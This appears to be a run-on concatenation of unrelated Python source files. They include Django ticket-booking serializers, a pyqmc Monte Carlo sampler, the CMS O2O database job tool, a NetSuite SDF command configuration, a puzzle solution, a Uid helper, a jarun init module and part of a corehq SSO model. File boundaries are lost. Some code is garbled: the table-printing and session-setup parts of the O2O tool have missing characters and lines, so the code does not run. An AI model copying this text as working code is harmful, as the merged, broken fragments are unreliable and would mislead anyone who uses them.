departures[0].trip.direction_id != required_direction_id ): raise ValidationError( f"Exactly one {'inbound' if required_direction_id else 'outbound'} " f"departure must be selected for this route.", code="invalid_departures", ) return departures def validate(self, data): """Format the validated data keys to indicate they contain objects not ids. Final output structure: { "route": Route, "departures": [Departure...], "tickets": [{"fare": Fare, "fare_rider_category": FareRiderCategory}...], "locale": str } """ data["route"] = data.pop("route_id", self.context.get("route")) data["departures"] = data.pop("departure_ids", []) if not (data["route"] or data["departures"]): raise ValidationError( "Either a route or a departure is required.", code="missing_route_and_departure", ) return data def create(self, validated_data): return Booking.objects.create_reservation( self.context["request"].user.maas_operator, self.validated_data["route"].feed.ticketing_system, ticket_data=validated_data, ) class ApiTicketSerializer(serializers.Serializer): ticket_type_id = serializers.CharField(source="fare.source_id") customer_type_id = serializers.CharField(source="fare_rider_category.source_id") class ApiDepartureSerializer(serializers.Serializer): trip_id = serializers.CharField(source="trip.source_id") date = serializers.DateField() class ApiBookingSerializer(PassthroughParametersSerializer): """Serializes BookingSerializer data to ticketing system API format.""" transaction_id = serializers.CharField(required=False, allow_blank=True) maas_operator_id = serializers.CharField(source="maas_operator.identifier") route_id = serializers.CharField(required=False, source="route.source_id") departures = ApiDepartureSerializer(required=False, many=True) tickets = ApiTicketSerializer(required=False, many=True) class ApiAvailabilitySerializer(serializers.Serializer): """Serializes Departures to Trips and dates for ticketing system API.""" trip_id = serializers.CharField(source="trip.source_id") date = serializers.DateField() YiqingZhouKelly/pyqmc0 # This must be done BEFORE importing numpy or anything else. # Therefore it must be in your main script. import os os.environ["MKL_NUM_THREADS"] = "1" os.environ["NUMEXPR_NUM_THREADS"] = "1" os.environ["OMP_NUM_THREADS"] = "1" import numpy as np import h5py def initial_guess(mol, nconfig, r=1.0): """ Generate an initial guess by distributing electrons near atoms proportional to their charge. Args: mol: A PySCF-like molecule object. Should have atom_charges(), atom_coords(), and nelec nconfig: How many configurations to generate. r: How far from the atoms to distribute the electrons Returns: A numpy array with shape (nconfig,nelectrons,3) with the electrons randomly distributed near the atoms. """ from pyqmc.coord import OpenConfigs, PeriodicConfigs epos = np.zeros((nconfig, np.sum(mol.nelec), 3)) wts = mol.atom_charges() wts = wts / np.sum(wts) # assign electrons to atoms based on atom charges # assign the minimum number first, and assign the leftover ones randomly # this algorithm chooses atoms *with replacement* to assign leftover electrons for s in [0, 1]: neach = np.array( np.floor(mol.nelec[s] * wts), dtype=int ) # integer number of elec on each atom nleft = ( mol.nelec[s] * wts - neach ) # fraction of electron unassigned on each atom nassigned = np.sum(neach) # number of electrons assigned totleft = int(mol.nelec[s] - nassigned) # number of electrons not yet assigned if totleft > 0: bins = np.cumsum(nleft) / totleft inds = np.argpartition( np.random.random((nconfig, len(wts))), totleft, axis=1 )[:, :totleft] ind0 = s * mol.nelec[0] epos[:, ind0 : ind0 + nassigned, :] = np.repeat( mol.atom_coords(), neach, axis=0 )[ np.newaxis ] # assign core electrons epos[:, ind0 + nassigned : ind0 + mol.nelec[s], :] = mol.atom_coords()[ inds ] # assign remaining electrons epos += r * np.random.randn(*epos.shape) # random shifts from atom positions if hasattr(mol, "a"): epos = PeriodicConfigs(epos, mol.lattice_vectors()) else: epos = OpenConfigs(epos) return epos def limdrift(g, cutoff=1): """ Limit a vector to have a maximum magnitude of cutoff while maintaining direction Args: g: a [nconf,ndim] vector cutoff: the maximum magnitude Returns: The vector with the cut off applied. """ tot = np.linalg.norm(g, axis=1) mask = tot > cutoff g[mask, :] = cutoff * g[mask, :] / tot[mask, np.newaxis] return g def vmc_file(hdf_file, data, attr, configs): import pyqmc.hdftools as hdftools if hdf_file is not None: with h5py.File(hdf_file, "a") as hdf: if "configs" not in hdf.keys(): hdftools.setup_hdf(hdf, data, attr) hdf.create_dataset("configs", configs.configs.shape) hdftools.append_hdf(hdf, data) hdf["configs"][:, :, :] = configs.configs def vmc( wf, configs, nsteps=100, tstep=0.5, accumulators=None, verbose=False, stepoffset=0, hdf_file=None, ): """Run a Monte Carlo sample of a given wave function. Args: wf: A Wave function-like class. recompute(), gradient(), and updateinternals() are used, as well as anything (such as laplacian() ) used by accumulators configs: Initial electron coordinates nsteps: Number of VMC steps to propagate tstep: Time step for move proposals. Only affects efficiency. accumulators: A dictionary of functor objects that take in (configs,wf) and return a dictionary of quantities to be averaged. np.mean(quantity,axis=0) should give the average over configurations. If None, then the coordinates will only be propagated with acceptance information. verbose: Print out step information stepoffset: If continuing a run, what to start the step numbering at. Returns: (df,configs) df: A list of dictionaries nstep long that contains all results from the accumulators. These are averaged across all walkers. configs: The final coordinates from this calculation. """ if accumulators is None: accumulators = {} if verbose: print("WARNING: running VMC with no accumulators") # Restart if hdf_file is not None: with h5py.File(hdf_file, "a") as hdf: if "configs" in hdf.keys(): configs.configs = np.array(hdf["configs"]) if verbose: print("Restarted calculation") nconf, nelec, ndim = configs.configs.shape df = [] wf.recompute(configs) for step in range(nsteps): if verbose: print("step", step) acc = [] for e in range(nelec): # Propose move grad = limdrift(np.real(wf.gradient(e, configs.electron(e)).T)) gauss = np.random.normal(scale=np.sqrt(tstep), size=(nconf, 3)) newcoorde = configs.configs[:, e, :] + gauss + grad * tstep newcoorde = configs.make_irreducible(e, newcoorde) # Compute reverse move new_grad = limdrift(np.real(wf.gradient(e, newcoorde).T)) forward = np.sum(gauss ** 2, axis=1) backward = np.sum((gauss + tstep * (grad + new_grad)) ** 2, axis=1) # Acceptance t_prob = np.exp(1 / (2 * tstep) * (forward - backward)) ratio = np.multiply(wf.testvalue(e, newcoorde) ** 2, t_prob) accept = ratio > np.random.rand(nconf) # Update wave function configs.move(e, newcoorde, accept) wf.updateinternals(e, newcoorde, mask=accept) acc.append(np.mean(accept)) avg = {} for k, accumulator in accumulators.items(): dat = accumulator.avg(configs, wf) for m, res in dat.items(): # print(m,res.nbytes/1024/1024) avg[k + m] = res # np.mean(res,axis=0) avg["acceptance"] = np.mean(acc) avg["step"] = stepoffset + step avg["nconfig"] = nconf vmc_file(hdf_file, avg, dict(tstep=tstep), configs) df.append(avg) return df, configs from __future__ import print_function __author__ = '' import sqlalchemy import sqlalchemy.ext.declarative import subprocess from datetime import datetime import os import sys import logging import string import json import CondCore.Utilities.credentials as auth prod_db_service = 'cms_orcon_prod' dev_db_service = 'cms_orcoff_prep' schema_name = 'CMS_CONDITIONS' sqlalchemy_tpl = 'oracle://%s:%s@%s' coral_tpl = 'oracle://%s/%s' private_db = 'sqlite:///o2o_jobs.db' startStatus = -1 messageLevelEnvVar = 'O2O_LOG_LEVEL' logFolderEnvVar = 'O2O_LOG_FOLDER' logger = logging.getLogger(__name__) _Base = sqlalchemy.ext.declarative.declarative_base() class O2OJob(_Base): __tablename__ = 'O2O_JOB' __table_args__ = {'schema' : schema_name} name = sqlalchemy.Column(sqlalchemy.String(100), primary_key=True) enabled = sqlalchemy.Column(sqlalchemy.Integer, nullable=False) frequent = sqlalchemy.Column(sqlalchemy.Integer, nullable=False) tag_name = sqlalchemy.Column(sqlalchemy.String(100), nullable=False) interval = sqlalchemy.Column(sqlalchemy.Integer, nullable=False) class O2OJobConf(_Base): __tablename__ = 'O2O_JOB_CONF' __table_args__ = {'schema' : schema_name} job_name = sqlalchemy.Column(sqlalchemy.ForeignKey(O2OJob.name), primary_key=True) insertion_time = sqlalchemy.Column(sqlalchemy.TIMESTAMP, primary_key=True) configuration = sqlalchemy.Column(sqlalchemy.String(4000), nullable=False) job = sqlalchemy.orm.relationship('O2OJob', primaryjoin="O2OJob.name==O2OJobConf.job_name") class O2ORun(_Base): __tablename__ = 'O2O_RUN' __table_args__ = {'schema' : schema_name} job_name = sqlalchemy.Column(sqlalchemy.ForeignKey(O2OJob.name), primary_key=True) start_time = sqlalchemy.Column(sqlalchemy.TIMESTAMP, primary_key=True) end_time = sqlalchemy.Column(sqlalchemy.TIMESTAMP, nullable=True) status_code = sqlalchemy.Column(sqlalchemy.Integer, nullable=False) log = sqlalchemy.Column(sqlalchemy.CLOB, nullable=True) job = sqlalchemy.orm.relationship('O2OJob', primaryjoin="O2OJob.name==O2ORun.job_name") def print_table( headers, table ): ws = [] for h in headers: ws.append(len(h)) for row in table: ind = 0 for c in row: if ind ws[ind]: ws[ind] = len(c) ind += 1 def printf( row ): line = '' ind = 0 for w in ws: fmt = '{:<%s}' %w if ind if username is None: self.logger.error('Credentials for service %s are not available' %db_service) raise Exception("Cannot connect to db %s" %db_service ) url = sqlalchemy_tpl %(username,pwd,db_service) session = None try: self.eng = sqlalchemy.create_engine( url, max_identifier_length=30) session = sqlalchemy.orm.scoped_session( sqlalchemy.orm.sessionmaker(bind=self.eng)) except sqlalchemy.exc.SQLAlchemyError as dberror: self.logger.error( str(dberror) ) return session def readConfiguration( self, config_filename ): config = '' try: with open( config_filename, 'r' ) as config_file: config = config_file.read() if config == '': self.logger.error( 'The file %s contains an empty string.', config_filename ) else: json.loads(config) except IOError as e: self.logger.error( 'The file %s cannot be open.', config_filename ) except ValueError as e: config = '' self.logger.error( 'The file %s contains an invalid json string.', config_filename ) return config def connect( self, service, args ): self.session = self.getSession( service, args.role, args.auth ) self.verbose = args.verbose if self.session is None: return False else: self.db_connection = coral_tpl %(service[0],schema_name) self.conf_dict['db']=self.db_connection return True def runManager( self ): return O2ORunMgr( self.db_connection, self.session, self.logger ) def add( self, job_name, config_filename, int_val, freq_flag, en_flag ): res = self.session.query(O2OJob.enabled).filter_by(name=job_name) enabled = None for r in res: enabled = r if enabled: self.logger.error( "A job called '%s' exists already.", job_name ) return False configJson = self.readConfiguration( config_filename ) if configJson == '': return False freq_val = 0 if freq_flag: freq_val = 1 job = O2OJob(name=job_name,tag_name='-',enabled=en_flag,frequent=freq_val,interval=int_val) config = O2OJobConf( job_name=job_name, insertion_time = datetime.utcnow(), configuration = configJson ) self.session.add(job) self.session.add(config) self.session.commit() self.logger.info( "New o2o job '%s' created.", job_name ) return True def set( self, job_name, en_flag, fr_val=None ): res = self.session.query(O2OJob.enabled).filter_by(name=job_name) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", job_name ) return if en_flag is not None and enabled != en_flag: job = O2OJob(name=job_name,enabled=en_flag) self.session.merge(job) self.session.commit() action = 'enabled' if not en_flag: action = 'disabled' self.logger.info( "Job '%s' %s." %(job_name,action) ) if fr_val is not None: job = O2OJob(name=job_name,frequent=fr_val) self.session.merge(job) self.session.commit() if fr_val==1: self.logger.info( "Job '%s' set 'frequent'" %job_name) else: self.logger.info( "Job '%s' unset 'frequent'" %job_name) def setConfig( self, job_name, config_filename ): res = self.session.query(O2OJob.enabled).filter_by(name=job_name) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", job_name ) return configJson = self.readConfiguration( config_filename ) if configJson == '': return False config = O2OJobConf( job_name=job_name, insertion_time = datetime.utcnow(), configuration = configJson ) self.session.add(config) self.session.commit() self.logger.info( "New configuration inserted for job '%s'", job_name ) def setInterval( self, job_name, int_val ): res = self.session.query(O2OJob.enabled).filter_by(name=job_name) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", job_name ) return job = O2OJob(name=job_name,interval=int_val) self.session.merge(job) self.session.commit() self.logger.info( "The execution interval for job '%s' has been updated.", job_name ) def listJobs( self ): runs = {} res = self.session.query(O2ORun.job_name,sqlalchemy.func.max(O2ORun.start_time)).group_by(O2ORun.job_name).order_by(O2ORun.job_name) for r in res: runs[r[0]] = str(r[1]) res = self.session.query(O2OJob.name, O2OJob.interval, O2OJob.enabled, O2OJob.frequent).order_by(O2OJob.name).all() table = [] for r in res: row = [] row.append(r[0]), row.append('%5d' %r[1] ) frequent = 'Y' if (r[3]==1) else 'N' row.append('%4s' %frequent ) enabled = 'Y' if (r[2]==1) else 'N' row.append('%4s' %enabled ) lastRun = '-' if r[0] in runs.keys(): lastRun = runs[r[0]] row.append( lastRun ) table.append(row) headers = ['Job name','Interval','Frequent','Enabled','Last run start'] print_table( headers, table ) def listConfig( self, jname ): res = self.session.query(O2OJob.enabled).filter_by(name=jname) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", jname ) return res = self.session.query( O2OJobConf.configuration, O2OJobConf.insertion_time ).filter_by(job_name=jname).order_by(O2OJobConf.insertion_time) configs = [] for r in res: configs.append((str(r[0]),r[1])) ind = len(configs) if ind: print("Configurations for job '%s'" %jname) for cf in reversed(configs): print('#%2d since: %s' %(ind,cf[1])) print(cf[0]) ind -= 1 else: self.logger.info("No configuration found for job '%s'" %jname ) def dumpConfig( self, jname, versionIndex, configFile ): versionIndex = int(versionIndex) res = self.session.query(O2OJob.enabled).filter_by(name=jname) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", jname ) return res = self.session.query( O2OJobConf.configuration, O2OJobConf.insertion_time ).filter_by(job_name=jname).order_by(O2OJobConf.insertion_time) configs = [] for r in res: configs.append((str(r[0]),r[1])) ind = len(configs) if versionIndex>ind or versionIndex==0: self.logger.error("Configuration for job %s with index %s has not been found." %(jname,versionIndex)) return print("Configuration #%2d for job '%s'" %(versionIndex,jname)) config = configs[versionIndex-1] print('#%2d since %s' %(versionIndex,config[1])) print(config[0]) if configFile is None or configFile == '': configFile = '%s_%s.json' %(jname,versionIndex) with open(configFile,'w') as json_file: json_file.write(config[0]) class O2ORunMgr(object): def __init__( self, db_connection, session, logger ): self.job_name = None self.start = None self.end = None self.conf_dict = {} self.conf_dict['db'] = db_connection self.session = session self.logger = logger def startJob( self, job_name ): self.logger.info('Checking job %s', job_name) exists = None enabled = None try: res = self.session.query(O2OJob.enabled,O2OJob.tag_name).filter_by(name=job_name) for r in res: exists = True enabled = int(r[0]) self.tag_name = str(r[1]) if exists is None: self.logger.error( 'The job %s is unknown.', job_name ) return 2 if enabled: res = self.session.query(O2OJobConf.configuration).filter_by(job_name=job_name).order_by(sqlalchemy.desc(O2OJobConf.insertion_time)).first() conf = None for r in res: conf = str(r) if conf is None: self.logger.warning("No configuration found for job '%s'" %job_name ) else: try: self.conf_dict.update( json.loads(conf) ) self.logger.info('Using configuration: %s ' %conf) except Exception as e: self.logger.error( str(e) ) return 6 self.job_name = job_name self.start = datetime.utcnow() run = O2ORun(job_name=self.job_name,start_time=self.start,status_code=startStatus) self.session.add(run) self.session.commit() return 0 else: self.logger.info( 'The job %s has been disabled.', job_name ) return 5 except sqlalchemy.exc.SQLAlchemyError as dberror: self.logger.error( str(dberror) ) return 7 return -1 def endJob( self, status, log ): self.end = datetime.utcnow() try: run = O2ORun(job_name=self.job_name,start_time=self.start,end_time=self.end,status_code=status,log=log) self.session.merge(run) self.session.commit() self.logger.info( 'Job %s ended.', self.job_name ) return 0 except sqlalchemy.exc.SQLAlchemyError as dberror: self.logger.error( str(dberror) ) return 8 def executeJob( self, args ): job_name = args.name command = args.executable logFolder = os.getcwd() if logFolderEnvVar in os.environ: logFolder = os.environ[logFolderEnvVar] datelabel = datetime.utcnow().strftime("%y-%m-%d-%H-%M-%S") logFileName = '%s-%s.log' %(job_name,datelabel) logFile = os.path.join(logFolder,logFileName) started = self.startJob( job_name ) if started !=0: return started ret = -1 try: # replacing %([key])s placeholders... command = command %(self.conf_dict) #replacing {[key]} placeholders command = command.format(**self.conf_dict ) except KeyError as exc: self.logger.error( "Unresolved template key %s in the command." %str(exc) ) return 3 self.logger.info('Command: "%s"', command ) try: self.logger.info('Executing command...' ) pipe = subprocess.Popen( command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) out = '' for line in iter(pipe.stdout.readline, ''): if args.verbose>=1: sys.stdout.write(line) sys.stdout.flush() out += line pipe.communicate() self.logger.info( 'Command returned code: %s' %pipe.returncode ) ret = pipe.returncode except Exception as e: self.logger.error( str(e) ) return 4 ended = self.endJob( pipe.returncode, out ) if ended != 0: ret = ended with open(logFile,'a') as logF: logF.write(out) return ret import optparse import argparse class O2OTool(): def execute(self): parser = argparse.ArgumentParser(description='CMS o2o command-line tool. For general help (manual page), use the help subcommand.') parser.add_argument('--db', type=str, help='The target database: pro ( for prod ) or dev ( for prep ). default=pro') parser.add_argument("--auth","-a", type=str, help="The path of the authentication file") parser.add_argument('--verbose', '-v', action='count', help='The verbosity level') parser_subparsers = parser.add_subparsers(title='Available subcommands') parser_create = parser_subparsers.add_parser('create', description='Create a new O2O job') parser_create.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_create.add_argument('--configFile', '-c', type=str, help='the JSON configuration file path',required=True) parser_create.add_argument('--interval', '-i', type=int, help='the chron job interval',default=0) parser_create.add_argument('--frequent', '-f',action='store_true',help='set the "frequent" flag for this job') parser_create.set_defaults(func=self.create,role=auth.admin_role) parser_setConfig = parser_subparsers.add_parser('setConfig', description='Set a new configuration for the specified job. The configuration is expected as a list of entries "param": "value" (dictionary). The "param" labels will be used to inject the values in the command to execute. The dictionary is stored in JSON format.') parser_setConfig.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_setConfig.add_argument('--configFile', '-c', type=str, help='the JSON configuration file path',required=True) parser_setConfig.set_defaults(func=self.setConfig,role=auth.admin_role) parser_setFrequent = parser_subparsers.add_parser('setFrequent',description='Set the "frequent" flag for the specified job') parser_setFrequent.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_setFrequent.add_argument('--flag', '-f', choices=['0','1'], help='the flag value to set',required=True) parser_setFrequent.set_defaults(func=self.setFrequent,role=auth.admin_role) parser_setInterval = parser_subparsers.add_parser('setInterval',description='Set a new execution interval for the specified job') parser_setInterval.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_setInterval.add_argument('--interval', '-i', type=int, help='the chron job interval',required=True) parser_setInterval.set_defaults(func=self.setInterval,role=auth.admin_role) parser_enable = parser_subparsers.add_parser('enable',description='enable the O2O job') parser_enable.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_enable.set_defaults(func=self.enable,role=auth.admin_role) parser_disable = parser_subparsers.add_parser('disable',description='disable the O2O job') parser_disable.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_disable.set_defaults(func=self.disable,role=auth.admin_role) parser_listJobs = parser_subparsers.add_parser('listJobs', description='list the registered jobs') parser_listJobs.set_defaults(func=self.listJobs,role=auth.reader_role) parser_listConf = parser_subparsers.add_parser('listConfig', description='shows the configurations for the specified job') parser_listConf.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_listConf.add_argument('--dump', type=int, help='Dump the specified config.',default=0) parser_listConf.set_defaults(func=self.listConf,role=auth.reader_role) parser_dumpConf = parser_subparsers.add_parser('dumpConfig', description='dumps a specific job configuration version') parser_dumpConf.add_argument('versionIndex', type=str,help='the version to dump') parser_dumpConf.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_dumpConf.add_argument('--configFile', '-c', type=str, help='the JSON configuration file name - default:[jobname]_[version].json') parser_dumpConf.set_defaults(func=self.dumpConf,role=auth.reader_role) parser_run = parser_subparsers.add_parser('run', description='Wrapper for O2O jobs execution. Supports input parameter injection from the configuration file associated to the job. The formatting syntax supported are the python ones: "command -paramName {paramLabel}" or "command -paramName %(paramLabel)s". where [paramName] is the name of the parameter required for the command, and [paramLabel] is the key of the parameter entry in the config dictionary (recommended to be equal for clarity!"') parser_run.add_argument('executable', type=str,help='command to execute') parser_run.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_run.set_defaults(func=self.run,role=auth.writer_role) args = parser.parse_args() if args.verbose is not None and args.verbose >=1: self.setup(args) return args.func() else: try: self.setup(args) sys.exit( args.func()) except Exception as e: logging.error(e) sys.exit(1) def setup(self, args): self.args = args db_service = prod_db_service if args.db is not None: if args.db == 'dev' or args.db == 'oradev' : db_service = dev_db_service elif args.db != 'orapro' and args.db != 'onlineorapro' and args.db != 'pro': raise Exception("Database '%s' is not known." %args.db ) logLevel = logging.DEBUG if args.verbose is not None and args.verbose >= 1 else logging.INFO self.mgr = O2OJobMgr( logLevel ) return self.mgr.connect( db_service, args ) def create(self): self.mgr.add( self.args.name, self.args.configFile, self.args.interval, True ) def setConfig(self): self.mgr.setConfig( self.args.name, self.args.configFile ) def setInterval(self): self.mgr.setInterval( self.args.name, self.args.interval ) def enable(self): self.mgr.set( self.args.name, True ) def disable(self): self.mgr.set( self.args.name, False ) def setFrequent(self): self.mgr.set( self.args.name, None, int(self.args.flag) ) def listJobs(self): self.mgr.listJobs() def listConf(self): self.mgr.listConfig( self.args.name ) def dumpConf(self): self.mgr.dumpConfig( self.args.name, self.args.versionIndex, self.args.configFile ) def run(self): rmgr = self.mgr.runManager() return rmgr.executeJob( self.args ) class Config(): config_object = { "cli_arguments": { "adddependencies": "-p \"[PROJECT_FOLDER]\" -all", "deploy": "-np -p \"[PROJECT_FOLDER]\"", "importbundle": "-p \"[PROJECT_FOLDER]\"", "importconfiguration": "-p \"[PROJECT_FOLDER]\"", # FEATURES:ALL_FEATURES", "importfiles": "-p \"[PROJECT_FOLDER]\" -excludeproperties", "importobjects": "-p \"[PROJECT_FOLDER]\"", "listbundles": "", "listconfiguration": "", "listfiles": "-folder \"/SuiteScripts\"", "listmissingdependencies": "-p \"[PROJECT_FOLDER]\"", "listobjects": "-p \"[PROJECT_FOLDER]\"", "preview": "-p \"[PROJECT_FOLDER]\"", "update": "-p \"[PROJECT_FOLDER]\"", "updatecustomrecordwithinstances": "-p \"[PROJECT_FOLDER]\"", # "uploadfiles": "-p \"[PROJECT_FOLDER]\"", # "uploadfolders": "-p \"[PROJECT_FOLDER]\"", "validate": "-p \"[PROJECT_FOLDER]\" -server", "issuetoken": "", "savetoken": "", "revoketoken": "" }, "custom_objects": [ [ "Bundle Installation Script", "bundleinstallationscript", "/Objects/Scripts/BundleInstallation", "customscript" ], [ "Centers", "center", "/Objects/CentersAndTabs/Center", "custcenter" ], [ "Center Categories", "centercategory", "/Objects/CentersAndTabs/Category", "custcentercategory" ], [ "Center Tabs", "centertab", "/Objects/CentersAndTabs/Tab", "custcentertab" ], [ "Client Scripts", "clientscript", "/Objects/Scripts/Client", "customscript" ], [ "CRM Custom Fields", "crmcustomfield", "/Objects/Fields/CRM", "custevent" ], [ "Custom Plugins", "customglplugin", "/Objects/Plugins/Custom", "customscript" ], [ "Custom Lists", "customlist", "/Objects/Lists", "customlist" ], [ "Custom Records", "customrecordtype", "/Objects/Records", "customrecord" ], [ "Email Capture Plugins", "emailcaptureplugin", "/Objects/Plugins/Email", "customscript" ], [ "Entity Custom Fields", "entitycustomfield", "/Objects/Fields/Entity", "custentity" ], [ "Entity Forms", "entryForm", "/Objects/Forms/Entry", "custform" ], [ "Transaction Forms", "transactionForm", "/Objects/Forms/Transaction", "custform" ], [ "Item Custom Fields", "itemcustomfield", "/Objects/Fields/Item", "custitem" ], [ "Item Number Custom Fields", "itemnumbercustomfield", "/Objects/Fields/ItemNumber", "custitem" ], [ "Item Option Custom Fields", "itemoptioncustomfield", "/Objects/Fields/ItemOption", "custitemoption" ], [ "Map Reduce Script", "mapreducescript", "/Objects/Scripts/MapReduce", "customscript" ], [ "Mass Update Script", "massupdatescript", "/Objects/Scripts/MassUpdate", "customscript" ], [ "Other Custom Field", "othercustomfield", "/Objects/Fields/Other", "custrecord" ], [ "Portlets", "portlet", "/Objects/Scripts/Portlet", "customscript" ], [ "Promotions Plugins", "promotionsplugin", "/Objects/Plugins/Promotions", "customscript" ], [ "Restlets", "restlet", "/Objects/Scripts/Restlet", "customscript" ], [ "Roles", "role", "/Objects/Roles", "customrole" ], [ "Saved Searches", "savedsearch", "/Objects/SavedSearches", "customsearch" ], [ "Scheduled Scripts", "scheduledscript", "/Objects/Scripts/Scheduled", "customscript" ], [ "Sub Tabs", "subtab", "/Objects/CentersAndTabs/SubTab", "custtab" ], [ "Suitelet", "suitelet", "/Objects/Scripts/Suitelet", "customscript" ], [ "Transaction Body Custom Field", "transactionbodycustomfield", "/Objects/Fields/TransactionBody", "transactionbodycustomfield" ], [ "Transaction Column Custom Field", "transactioncolumncustomfield", "/Objects/Fields/TransactionColumn", "custcol" ], [ "User Event Script", "usereventscript", "/Objects/Scripts/UserEvent", "customscript" ], [ "Workflows", "workflow", "/Objects/Workflows", "customworkflow" ], [ "Workflow Action Scripts", "workflowactionscript", "/Objects/Scripts/WorkflowAction", "customscript" ] ], "cli_commands": [ [ "Add Dependencies to Manifest", "Adds missing dependencies to the manifest file.", "adddependencies" ], [ "Deploy to Account", "Deploys the folder or zip file that contains the SuiteCloud project.", "deploy" ], [ "Import Bundle", "Imports a customization bundle from your NetSuite account and\nconverts it to an account customization project.", "importbundle" ], [ "Import Configuration", "Imports the feature configuration from your NetSuite account to the account customization project so that you can enable or disable features in the project.", "importconfiguration" ], [ "Import Files", "Imports files from your NetSuite account to the account customization project.", "importfiles" ], [ "Import Objects", "Imports custom objects from your NetSuite account to the SuiteCloud project.", "importobjects" ], [ "List Bundles", "Lists the customization bundles that were created in your NetSuite account.", "listbundles" ], [ "List Configuration", "List available account configuration.", "listconfiguration" ], [ "List Files", "Lists the files in the File Cabinet of your NetSuite account.", "listfiles" ], [ "List Missing Dependencies", "Lists the missing dependencies in the SuiteCloud project.", "listmissingdependencies" ], [ "List Objects", "Lists the custom objects in your NetSuite account.", "listobjects" ], [ "Preview", "Previews the deployment steps of a folder or zip file that contains the SuiteCloud project.", "preview" ], [ "Update", "Updates existing custom objects in the SuiteCloud project folder with the custom objects in your NetSuite account.", "update" ], [ "Update Custom Record With Instances", "Updates the custom record object and its instances in the SuiteCloud project.", "updatecustomrecordwithinstances" ], # [ # "Upload File to Account", # "Either the current file if in a SuiteScript folder, or show you a list of files to upload.", # "uploadfiles" # ], # [ # "Upload Folder to Account", # "Select an entire folder to upload", # "uploadfolders" # ], [ "Validate Project", "Validates the folder or zip file that contains the SuiteCloud project.", "validate" ], [ "Issue Token", "Issues a TBA token to authenticate against your NetSuite Production account.", "issuetoken" ], [ "Save Token", "Saves the latest TBA token created from your NetSuite account to use with SDF CLI.", "savetoken" ], [ "Revoke Token", "Revokes the latest TBA token that was issued to your NetSuite Production account using the issuetoken command.", "revoketoken" ], [ "Set Password", "Sets the password for this environment and session", "setpassword" ], [ "Clear Password", "Clears the password for this environment from this session", "clearpassword" ] ] } def get( index_key ): return Config.config_object[ index_key ]terror/Solutions from math import pi def main(): d = {v: i for i, v in enumerate([i for i in range(65, 91)] + [32, 39])} for _ in range(int(input())): i, ans = list(input()), 0 start = d[ord(i[0])] for ch in i[1:]: nxt = d[ord(ch)] ans += min(abs(start - nxt), 28 - (abs(start - nxt))) * pi / 7 start = nxt print(ans + (len(i))) if __name__ == "__main__": main() src/Uid/Uid.py from uuid import uuid1 def uid(): """ @see: https://docs.python.org/3.8/library/uuid.html?highlight=uuid#module-uuid """ return str(uuid1()) class Uid(object): """Defines and set a unique id as property """ @property def id(self): """`id` property, read-only""" return self.__id def __init__(self, *args, **kwargs): self.__id = uid() super(Uid, self).__init__(*args, **kwargs) def __eq__(self, other): """Implements the `==` operator""" return self.id == other.id # `!=` is implicit def __hash__(self): """Implements the `hash` built-in function""" return hash(self.id) if __name__ == '__main__': a = Uid() b = Uid() c = Uid() assert isinstance(a, Uid) # Force `c` to have the same id as `a` c._Uid__id = a.id assert a != b assert a == c nishemon/jarun # -*- coding: utf-8 -*- import shutil import os import App import Conf import Consts import util import sub_install def _init_sys(conf, syspod): sysbuilder = syspod.new_context_builder([':'.join(Consts.SYS_JARS[0])]) try: for j in Consts.SYS_JARS: pv = util.download_package(Consts.INIT_REPOSITORY_URLS, j[0], j[1], sysbuilder.get_working(), j[2] if 2 < len(j) else None) if pv: sysbuilder.add_direct(':'.join(j[0:2]), pv[0], pv[1]) sysjava = util.new_sys_java(conf, sysbuilder.get_working()) code, output = sysjava.sys_run(['Health'], conf.to_dict()) if code != 0: raise Exception("Fail to execute marun java library.\n" + str(output)) except: sysbuilder.revert() raise return sysbuilder.commit(None, None) def init(conf, force=False): javas = util.find_javas() if len(javas) == 0: return False, "Command \"java\" is not found. Set JAVA_HOME/PATH/MARUN_JAVA or config file." rootdir = conf.workdir if force: shutil.rmtree(rootdir, True) util.mkdirs(rootdir) syspod = App.AppPod(conf, rootdir) sysctx = syspod.get_current_context() if not sysctx: sysctx = _init_sys(conf, syspod) if [x for x in conf.repository_list if x.baseurl and x.baseurl.startswith('s3:')]: artifacts = sysctx.get_installs() if not Consts.S3_ADDONS <= artifacts: artifacts = artifacts | Consts.S3_ADDONS backup = conf.repository_list conf.repository_list = map(Conf.StaticRepository, Consts.INIT_REPOSITORY_URLS) sub_install.install_to_pod(conf, syspod, artifacts) conf.repository_list = backup return True, None def _init(conf, args): return init(conf, args.force) def setup_subcmd(subparsers): init_parser = subparsers.add_parser('init', help='Initialize') init_parser.add_argument('-f', '--force', help='remove all', action='store_true') init_parser.set_defaults(handler=_init, init=True) corehq/apps/sso/models.py0 from django.db import models from corehq.apps.accounting.models import BillingAccount from corehq.apps.sso import certificates from corehq.apps.sso.exceptions import ServiceProviderCertificateError class IdentityProviderType: AZURE_AD = 'azure_ad' CHOICES = ( (AZURE_AD, "Azure AD"), ) class ServiceProviderCertificate: def __init__(self): """ To increase the security with SAML transactions, we will provide the IdP with our public key for an x509 certificate unique to our interactions with a particular IdP. This certificate will be regenerated automatically by a periodic task every year. """ key_pair = certificates.create_key_pair() cert = certificates.create_self_signed_cert(key_pair) self.public_key = certificates.get_public_key(cert) self.private_key = certificates.get_private_key(key_pair) self.date_expires = certificates.get_expiration_date(cert) class IdentityProvider(models.Model): """ This stores the information necessary to make a SAML request to an external IdP. Right now this process supports Azure AD and the plan is to add support for other identity provider types in the future. """ # these three fields must only ever be editable by Accounting admins name = models.CharField(max_length=128) slug = models.CharField(max_length=256, db_index=True, unique=True) idp_type = 